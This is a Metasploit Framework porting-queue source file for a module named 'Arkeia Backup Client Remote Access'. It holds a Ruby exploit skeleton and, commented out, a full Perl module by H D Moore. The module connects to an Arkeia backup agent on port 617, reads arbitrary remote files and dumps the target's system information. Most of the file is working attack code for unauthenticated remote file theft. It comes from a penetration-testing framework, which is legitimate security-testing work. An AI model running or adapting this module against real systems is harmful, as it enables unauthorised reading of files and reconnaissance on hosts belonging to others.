metasploit-framework/dev/porting/queue/arkeia_agent_access.rb

293 lines
6.6 KiB
Ruby
Raw Normal View History

require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Arkeia Backup Client Remote Access',
'Description' => %q{
This module provides a number of functions for manipulating
an Arkeia Backup Client installation.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '15130'],
[ 'URL', 'http://metasploit.com/research/arkeia_agent/'],
[ 'MIL', '5'],
],
'Privileged' => true,
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'any',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Feb 20 2005',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::arkeia_agent_access;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use Pex::Arkeia;
my $advanced = { };
my $info =
{
'Name' => 'Arkeia Backup Client Remote Access',
'Version' => '$Revision$',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Arch' => [ ],
'OS' => [ ],
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 617],
'RFILE' => [0, 'DATA', 'The remote file path'],
'LFILE' => [0, 'DATA', 'The local file path'],
'HNAME' => [0, 'DATA', 'The remote host name'],
},
'Description' => Pex::Text::Freeform(qq{
This module provides a number of functions for manipulating
an Arkeia Backup Client installation.
}),
'Refs' =>
[
['OSVDB', 15130],
['URL', 'http://metasploit.com/research/arkeia_agent/'],
['MIL', '5'],
],
'Targets' =>
[
['Read a file from the remote system', 'read'],
['Display the remote system information', 'info'],
# ['Write a file to the remote system', 'write'],
],
'Keys' => ['arkeia'],
'DisclosureDate' => 'Feb 20 2005',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$self->PrintLine("[*] Querying the Arkeia Backup Client...");
my %info = Pex::Arkeia::ClientInfo($s);
# Give up if we did not get a version response back
if (! $info{'Version'} ) {
$self->PrintLine("[*] Error: ". $info{'Error'});
return $self->CheckCode('Unknown');
}
# Dump out the information returned by the server
$self->PrintLine("[*] System Information");
foreach my $inf (keys %info) {
next if $inf eq 'Error';
$self->PrintLine(" $inf: $info{$inf}");
}
return $self->CheckCode('Confirmed');
}
sub Exploit {
my $self = shift;
my $func = $self->Targets->[$self->GetVar('TARGET')];
return $self->ARKRead() if $func->[1] eq 'read';
return $self->ARKWrite() if $func->[1] eq 'write';
return $self->ARKInfo() if $func->[1] eq 'info';
$self->PrintLine("[*] Unknown attack type specified");
return;
}
sub ARKRead {
my $self = shift;
my $path_rem = $self->GetVar('RFILE');
my $path_loc = $self->GetVar('LFILE');
my ($name, $drive, $path);
my $s = $self->Connect || return;
$name = $self->GetEnv('HNAME');
if (! $name) {
$self->PrintLine("[*] Warning: The 'HNAME' option should be set to the remote host name");
}
# Handle Windows paths
if ($path_rem =~ m/^([a-z]:)(\\.*)/i) {
$drive = $1;
$path = $2;
$path =~ s:\\:/:g;
}
# Handle UNIX paths
else {
$drive = '/';
$path = $path_rem;
}
my %ret = Pex::Arkeia::GetFile($s, $name, $drive, $path);
if (! $ret{'Data'}) {
$self->PrintLine("[*] The file transfer failed due to an error");
$self->PrintLine("[*] ".$ret{'Info'}) if $ret{'Info'};
$self->PrintLine("[*] Error: ".$ret{'Error'}) if $ret{'Error'};
return;
}
# Quick and dirty way to pull the file contents out
my ($fsize) = $ret{'Data'} =~ m/n_fsize\x00(\d+)\x00/ms;
my $findex = rindex($ret{'Data'}, "n_cksum\x00");
my $fdata = substr($ret{'Data'}, $findex - $fsize, $fsize);
my $trunc = $fsize;
# If the file was truncated, we try to salvage what we can
if ($findex == -1) {
$self->PrintLine("[*] Warning: This file is greater than 65k and will be truncated");
(undef, $trunc, $fdata) = $ret{'Data'} =~ m/n_(size|cmpatrr)\x00[^\x00]+\x00[^\x00]+\x00[^\x00]+\x00(\d{5})(.*)/msg;
# Even more gross hacks
if (! $trunc) {
$self->PrintLine("[*] Could not determine the file start, dumping the entire response");
$fdata = $ret{'Data'};
$trunc = length($fdata);
}
}
$self->PrintLine("[*] Transferred $trunc of $fsize bytes for $path_rem");
if ($path_loc) {
if (! open(TMP, '>'.$path_loc)) {
$self->PrintLine("[*] Could not open local path $path_loc: $!");
return;
}
print TMP $fdata;
close(TMP);
return;
}
$self->PrintLine("[*] Dumping file contents...");
$self->PrintLine($fdata);
return;
}
sub ARKWrite {
my $self = shift;
my $path_rem = $self->GetVar('RFILE');
my $path_loc = $self->GetVar('LFILE');
$self->PrintLine("[*] This feature is still under development");
return;
my $s = $self->Connect || return;
}
sub ARKInfo {
my $self = shift;
my $s = $self->Connect || return;
$self->PrintLine("[*] Querying the Arkeia Backup Client...");
my %info = Pex::Arkeia::ClientInfo($s);
# Give up if we did not get a version response back
if (! $info{'Version'} ) {
$self->PrintLine("[*] Error: ". $info{'Error'});
return;
}
# Dump out the information returned by the server
$self->PrintLine("[*] System Information");
foreach my $inf (keys %info) {
next if $inf eq 'Error';
$self->PrintLine(" $inf: $info{$inf}");
}
$s->Close;
return;
}
sub Connect {
my $self = shift;
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
return $s;
}
1;
=end
end
end